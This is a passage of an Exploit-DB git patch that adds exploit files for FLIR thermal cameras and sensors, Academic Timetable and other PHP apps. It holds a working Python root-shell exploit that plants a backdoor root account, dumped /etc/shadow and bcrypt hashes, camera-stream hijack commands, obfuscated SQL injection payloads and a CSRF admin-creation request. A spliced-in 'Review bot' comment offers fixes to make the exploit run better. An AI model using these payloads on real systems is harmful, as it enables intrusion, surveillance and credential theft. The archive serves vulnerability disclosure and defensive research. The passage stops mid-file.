From 731dd0f423577fa8158a61f08ebb69d0f3e297c1 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 16 Oct 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-10-16
22 changes to exploits/shellcodes
Snes9K 0.0.9z - Buffer Overflow (SEH)
NoMachine < 5.3.27 - Remote Code Execution
MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
---
 exploits/hardware/webapps/45597.txt | 92 ++++++++++++
 exploits/hardware/webapps/45599.txt | 20 +++
 exploits/hardware/webapps/45602.py | 179 +++++++++++++++++++++++
 exploits/hardware/webapps/45606.txt | 24 +++
 exploits/hardware/webapps/45607.txt | 63 ++++++++
 exploits/php/webapps/45596.txt | 101 +++++++++++++
 exploits/php/webapps/45600.txt | 39 +++++
 exploits/php/webapps/45603.txt | 55 +++++++
 exploits/php/webapps/45604.txt | 51 +++++++
 exploits/php/webapps/45605.txt | 118 +++++++++++++++
 exploits/php/webapps/45610.txt | 172 ++++++++++++++++++++++
 exploits/php/webapps/45612.php | 60 ++++++++
 exploits/php/webapps/45613.txt | 38 +++++
 exploits/{php => ruby}/webapps/45592.txt | 0
 exploits/ruby/webapps/45601.txt | 44 ++++++
 exploits/windows/local/45583.txt | 1 +
 exploits/windows/local/45585.txt | 1 +
 exploits/windows/local/45587.txt | 2 +
 exploits/windows/remote/45611.c | 111 ++++++++++++++
 exploits/windows_x86/local/45598.py | 58 ++++++++
 files_exploits.csv | 18 ++-
 21 files
changed, 1246 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/webapps/45597.txt
 create mode 100644 exploits/hardware/webapps/45599.txt
 create mode 100755 exploits/hardware/webapps/45602.py
 create mode 100644 exploits/hardware/webapps/45606.txt
 create mode 100644 exploits/hardware/webapps/45607.txt
 create mode 100644 exploits/php/webapps/45596.txt
 create mode 100644 exploits/php/webapps/45600.txt
 create mode 100644 exploits/php/webapps/45603.txt
 create mode 100644 exploits/php/webapps/45604.txt
 create mode 100644 exploits/php/webapps/45605.txt
 create mode 100644 exploits/php/webapps/45610.txt
 create mode 100644 exploits/php/webapps/45612.php
 create mode 100644 exploits/php/webapps/45613.txt
 rename exploits/{php => ruby}/webapps/45592.txt (100%)
 create mode 100644 exploits/ruby/webapps/45601.txt
 create mode 100644 exploits/windows/remote/45611.c
 create mode 100755 exploits/windows_x86/local/45598.py
diff --git a/exploits/hardware/webapps/45597.txt b/exploits/hardware/webapps/45597.txt
new file mode 100644
index 000000000..c6cb291d7
--- /dev/null
+++ b/exploits/hardware/webapps/45597.txt
@@ -0,0 +1,92 @@ +# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure +# Auhor: Gjoko 'LiquidWorm' Krstic +# Date: 2018-10-14 +# Vendor: FLIR Systems, Inc. +# Product web page: https://www.flir.com +# Affected version: Firmware: 1.32.16, 1.17.13 +# OS: neco_v1.8-0-g7ffe5b3 +# Hardware: Flir Systems Neco Board +# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14 +# References: +# Advisory ID: ZSL-2018-5493 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5493.php + +# Desc: The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary +# file disclosure vulnerability. Input passed via the 'file' parameter in download.php +# is not properly verified before being used to download config files. This can be +# exploited to disclose the contents of arbitrary files via absolute path. + +# PoC +# 1. GET http://TARGET/download.php?file=/etc/passwd HTTP/1.1 + +root:x:0:0:root:/home/root:/bin/sh +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +messagebus:x:999:998::/var/lib/dbus:/bin/false +fliruser:x:1000:1000::/home/fliruser:/bin/sh +xuser:x:1001:1001::/home/xuser:/bin/sh +sshd:x:998:995::/var/run/sshd:/bin/false +avahi:x:997:994::/var/run/avahi-daemon:/bin/false +avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false 
+ +# 2. GET http://TARGET/download.php?file=/etc/shadow HTTP/1.1 + +root:qA7LRQDa1amZM:17339:0:99999:7::: +daemon:*:17339:0:99999:7::: +bin:*:17339:0:99999:7::: +sys:*:17339:0:99999:7::: +sync:*:17339:0:99999:7::: +games:*:17339:0:99999:7::: +man:*:17339:0:99999:7::: +lp:*:17339:0:99999:7::: +mail:*:17339:0:99999:7::: +news:*:17339:0:99999:7::: +uucp:*:17339:0:99999:7::: +proxy:*:17339:0:99999:7::: +www-data:*:17339:0:99999:7::: +backup:*:17339:0:99999:7::: +list:*:17339:0:99999:7::: +irc:*:17339:0:99999:7::: +gnats:*:17339:0:99999:7::: +nobody:*:17339:0:99999:7::: +messagebus:!:17339:0:99999:7::: +fliruser:m1iiKYIJr63u2:17339:0:99999:7::: +xuser:!:17339:0:99999:7::: +sshd:!:17339:0:99999:7::: +avahi:!:17339:0:99999:7::: +avahi-autoipd:!:17339:0:99999:7::: + +# 3. GET http://TARGET/download.php?file=/FLIR/system/profile.d/userPreset.tar HTTP/1.1 +# GET http://TARGET/download.php?file=/FLIR/usr/www/FLIR/db/users.db HTTP/1.1 + +lqwrm@metalgear:~/$ sqlite3 users.db +SQLite version 3.11.0 2016-02-15 17:29:24 +Enter ".help" for usage hints. +sqlite> .tables +roles users +sqlite> select * from roles; +1|admin +2|user +3|viewer +sqlite> select * from users; +1|admin||$2y$10$/J/KDhh0.UDg5pbwtPG9B.W2gEWrS36qHji1scgxO7uiTk1GuAa.K|1 +2|user||$2y$10$O5Ybml6qN9caTjezQR0f8.z230PavQYUwmZCzMVxL6BMeNvLWEr9q|2 +3|viewer||$2y$10$lxA0o325EuUtVAaTItBt.OSpZSfxIrT56ntm7326FQ/fTBc0ODWqq|3 +4|service||$2y$10$syAL0yMLBfN/8.sciVnCE.kBto6mtVvjrmyhPQAo7oV3rq8X8pBke|4 +5|developer||$2y$10$LBNcMBC/Bn3VVnhlI1j7huOZ.UOykGaq3VZ.YAgu0mAZXAQ8q36uG|5 +sqlite>.q \ No newline at end of file diff --git a/exploits/hardware/webapps/45599.txt b/exploits/hardware/webapps/45599.txt new file mode 100644 index 000000000..a38725350 --- /dev/null +++ b/exploits/hardware/webapps/45599.txt 
@@ -0,0 +1,20 @@
+# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
+# Author: Gjoko 'LiquidWorm' Krstic
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: http://www.brickstream.com
+# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
+# Tested on: Titan, Api/1.0.0
+# References:
+# ZSL-2018-5495
+# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
+
+# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
+# download and file disclosure vulnerability when calling the ExportConfig REST
+# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
+# information and help her in authentication bypass, privilege escalation and/or
+# full system access.
+
+$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
+$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
+$ curl http://192.168.2.1:8083/restapi/system/ExportLogs
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45602.py b/exploits/hardware/webapps/45602.py
new file mode 100755
index 000000000..a26e2b03f
--- /dev/null
+++ b/exploits/hardware/webapps/45602.py
@@ -0,0 +1,179 @@ +# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-10-14 +# Vendor: FLIR Systems, Inc. +# Product web page: https://www.flir.com +# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board +# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14 +# References: +# Advisory ID: ZSL-2018-5491 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php + +# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated +# command injection vulnerabilities. The issues can be triggered when calling +# multiple unsanitized HTTP GET/POST parameters within the shell_exec function +# in res.php and palette.php file. This can be exploited to inject arbitrary +# system commands and gain root remote code execution. + +# /FLIR/usr/www/res.php: +# ---------------------- +# 1. + + +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +import requests +import colorama +import random## +import time#### +import json#### +import sys##### +import os###### + +piton = os.path.basename(sys.argv[0]) + +if len(sys.argv) < 2: + print '\n\x20\x20[*] Usage: '+piton+' \n' + sys.exit() + +bannah = """ +.---------------------------------. +| 1984 Pictures | +| | +| presents | +| ___ | +| [| |=|{)__ | +| |___| \/ ) | +| /|\ /| | +| / | \ | \\ | +.---------------------------------. +""" +print bannah +time.sleep(4) +os.system('clear') + +print '\nFLIR AX8 Thermal Camera Remote Root Exploit' +print 'By Zero Science Lab' + +ICU = ''' + ```````` + `./+ooosoooooo+/.` + `.+ss+//:::::::://+ss+.` + -oyo/::::-------:::::/oyo- + `/yo+:::-------.------:::+oy/` + `+yo+::---...........----:/+oy+` + `/yo++/--...../+oo+:....---:/+oy/` + `ss++//:-.../yhhhhhhy/...-://++ss` + .ho++/::--.-yhhddddhhy-.--:://+oh. + .ho+//::---/mmmmmmmmmm:---::/++oh. 
+ `ss++//::---+mNNNNNNm+---:://++ss` + `/yo+//:::----+syys+-----://++oy/` + `+yo++//:::-----------:://++oy+` + `/yo++///:::::-:::::://+++oy/` + .oyo+++////////////+++oyo. + `.+ssoo++++++++++ooss+.` + `./+osssssssso+/.` + ```````` +''' + +colors = list(vars(colorama.Fore).values()) +colored_chars = [random.choice(colors) + char for char in ICU] + +print(''.join(colored_chars)) + +print +print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' +print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n' + +print '[*] Additional commands:' +print ' [+] \'addroot\' for add root user.' +print ' [+] \'exit\' for exit.\n' + +while True: + + zeTargets = 'http://'+sys.argv[1]+'/res.php' + zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m') + zeHeaders = {'Cache-Control' : 'max-age=0', + 'User-Agent' : 'thricer/251.4ev4h', + 'Accept' : 'text/html,application/xhtml+xml', + 'Accept-Encoding' : 'gzip, deflate', + 'Accept-Language' : 'mk-MK,mk;q=1.7', + 'Connection' : 'close', + 'Connection-Type' : 'application/x-www-form-urlencoded'} + zePardata = {'action' : 'get', + 'resource' : ';'+zeCommand} + + try: + + zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) + print json.loads(zeRequest.text) + + if zeCommand.strip() == 'exit': + sys.exit() + + if zeCommand.strip() == 'addroot': + print '[+] Blind command injection using palette.php...' + print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...' 
+ + nuTargets = 'http://'+sys.argv[1]+'/palette.php' + nuHeaders = zeHeaders + + nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31' + '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f' + '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d' + '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45' + '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67' + '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36' + '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39' + '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a' + '\\x3a\\x3a\\x0a\\x0d') + + nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'} + nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'} + + requests.post(nuTargets, headers=nuHeaders, data=nuPadata1) + time.sleep(2) + requests.post(nuTargets, headers=nuHeaders, data=nuPadata2) + + print '[*] Success!\n' + else: pass + + except Exception: + print '[*] Error!' + break + +sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/45606.txt b/exploits/hardware/webapps/45606.txt new file mode 100644 index 000000000..5f78f4828 --- /dev/null +++ b/exploits/hardware/webapps/45606.txt 
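Review bot: The `#!/usr/bin/env python` line sits after the comment header instead of on line 1, so even with the file's 100755 mode the shebang is inert and the script only runs when invoked through an interpreter explicitly. The script is Python 2 only (`print` statements, `raw_input`) but nothing in the header says so; a line such as `# Requires: Python 2.7, requests, colorama` next to the existing header fields would save the next reader a failed run. In `zeHeaders` the key `'Connection-Type'` is not an HTTP header; `'Content-Type'` looks intended, though `requests` already sets it from `data=`, so the entry is dead either way. The `##`/`####` tails on the `import random` .. `import os` lines are alignment padding rather than comments, and `else: pass` after the `addroot` branch is a no-op; both can be dropped without changing behaviour.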
@@ -0,0 +1,24 @@
+# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: https://www.flir.com
+# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
+# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
+# References:
+# Advisory ID: ZSL-2018-5492
+# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
+
+# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
+# live RTSP video stream access.
+
+# PoC
+
+$ cvlc rtsp://TARGET/mpeg4 --fullscreen
+$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
+$ ffplay rtsp://TARGET/mpeg4
+$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
+
+# PoC - To freeze the stream:
+
+$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45607.txt b/exploits/hardware/webapps/45607.txt
new file mode 100644
index 000000000..f2c0249ee
--- /dev/null
+++ b/exploits/hardware/webapps/45607.txt
@@ -0,0 +1,63 @@
+FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure
+
+
+Vendor: FLIR Systems, Inc.
+Product web page: http://www.brickstream.com
+Affected version: Firmware: 2.1.742.1842
+ Api: 1.0.0
+ Node: 0.10.33
+ Onvif: 0.1.1.47
+
+Summary: The Brickstream line of sensors provides highly accurate, anonymous
+information about how people move into, around, and out of physical places.
+These smart devices are installed overhead inside retail stores, malls, banks,
+stadiums, transportation terminals and other brick-and-mortar locations to
+measure people's behaviors within the space.
+
+Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
+unauthorized live RTSP video stream access.
+
+Tested on: Titan
+ Api/1.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5496
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php
+
+
+26.07.2018
+
+--
+
+
+#!/bin/bash
+#
+# PoC:
+#
+
+echo 'Fetching some images...'
+for x in {1..10};
+ do curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#;
+ done
+echo 'Done.'
+sleep 2
+echo 'Generating video...'
+sleep 2
+ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
+echo 'Running generated video...'
+sleep 2
+vlc counted_people.mp4
+
+#
+# http://192.168.2.1:8083/middleImage.jpg
+# http://192.168.2.1:8083/rightimage.jpg
+# http://192.168.2.1:8083/leftimage.jpg
+# http://192.168.2.1:8083/threeDimage.jpg
+# http://192.168.2.1:8083/startStopTrafficMapImage.jpg
+# http://192.168.2.1:8083/dwellTrafficMapImage.jpg
+# http://192.168.2.1:8083/heightTrafficMapImage.jpg
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/45596.txt b/exploits/php/webapps/45596.txt
new file mode 100644
index 000000000..5b3f6529f
--- /dev/null
+++ b/exploits/php/webapps/45596.txt
@@ -0,0 +1,101 @@ +# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://geoffpartridge.net/ +# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download +# Version: 7.0a-7.0b +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/timetable_pdf_content.php?master=facility&id=[SQL] + +-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*) /*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- + +http://192.168.1.27/[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- + +GET /[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 13 Oct 2018 01:20:12 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/timetable_pdf.php?master=facility&id=[SQL] + +-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%5f%69%64%2c%30%78%33%61%2c%75%73%65%5f%6e%61%6d%65%2c%30%78%33%61%2c%72%6f%6c%5f%69%64%2c%30%78%33%61%2c%70%77%64%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%6d%73%5f%75%73%65%72%29%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- + +Pdf File: -66' __!11111unIoN__ __!11111sElEcT__ .......--.pdf +BT 34.016 451.893 Td /F2 12.0 Tf [(Notice)] TJ ET +BT 70.688 451.893 Td /F1 12.0 Tf [(: Undefined index: db_id in )] TJ ET +BT 216.104 451.893 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET +BT 786.236 451.893 Td /F1 12.0 Tf [( on )] TJ ET +BT 34.016 437.241 Td /F1 12.0 Tf [(line )] TJ ET +BT 56.024 437.241 Td /F2 12.0 Tf [(157)] TJ ET +BT 34.016 408.189 Td /F2 12.0 Tf [(Notice)] TJ ET +BT 70.688 408.189 Td /F1 12.0 Tf [(: Undefined variable: master_name in )] TJ ET +BT 34.016 393.537 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET +BT 604.148 393.537 Td /F1 12.0 Tf [( on line )] TJ ET +BT 646.172 393.537 Td /F2 12.0 Tf [(198)] TJ ET +BT 34.016 378.885 Td /F2 12.0 Tf [(Facility : [STAFF:Staff:VIEW:)] TJ ET +BT 34.016 364.233 Td /F2 12.0 Tf [(STUDENT:Student:VIEW:)] TJ ET +BT 34.016 349.581 Td /F2 12.0 Tf [(ADMIN:admin:ADMIN:*4ACFE3202A5FF5CF467898FC58AAB1D615029441])] TJ ET +1.000 1.000 1.000 rg + +# POC: +# 3) +# 
http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=1[SQL] + +%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 + +GET /[PATH]/server_user.php?iDisplayStart=0%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 13 Oct 2018 01:32:02 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1408 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=1[SQL] + +%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 + +GET 
/[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=10%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 13 Oct 2018 01:42:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1062 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45600.txt b/exploits/php/webapps/45600.txt new file mode 100644 index 000000000..63430e46e --- /dev/null +++ b/exploits/php/webapps/45600.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) +# Dork: N/A +# Date: 2018-10-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://geoffpartridge.net/ +# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download +# Version: 7.0a-7.0b +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Description +# New admin can be added.. + +http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb + +GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 13 Oct 2018 01:10:29 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 910 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`ms_user` */ +$ms_user = array( + array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117') +); +# \ No newline at end of file diff --git a/exploits/php/webapps/45603.txt b/exploits/php/webapps/45603.txt new file mode 100644 index 000000000..ac03c98fb --- /dev/null +++ b/exploits/php/webapps/45603.txt 
@@ -0,0 +1,55 @@ +# Exploit Title: College Notes Management System 1.0 - 'user' SQL Injection +# Dork: N/A +# Date: 2018-10-15 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://anirbandutta.ml/ +# Software Link: https://sourceforge.net/projects/college-notes-management/ +# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery +# git clone https://git.code.sf.net/p/college-notes-management/code college-notes-management-code +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://192.168.1.27/[PATH]/login.php +# login.php +# ...... +# if (isset($_POST['login'])) { +# $username = $_POST['user']; +# $password = $_POST['pass']; +# mysqli_real_escape_string($conn, $username); +# mysqli_real_escape_string($conn, $password); +# $query = "SELECT * FROM users WHERE username = '$username'"; +# $result = mysqli_query($conn , $query) or die (mysqli_error($conn)); +# if (mysqli_num_rows($result) > 0) { +# while ($row = mysqli_fetch_array($result)) { +# $id = $row['id']; +# $user = $row['username']; +# $pass = $row['password']; +# $name = $row['name']; +# ...... 
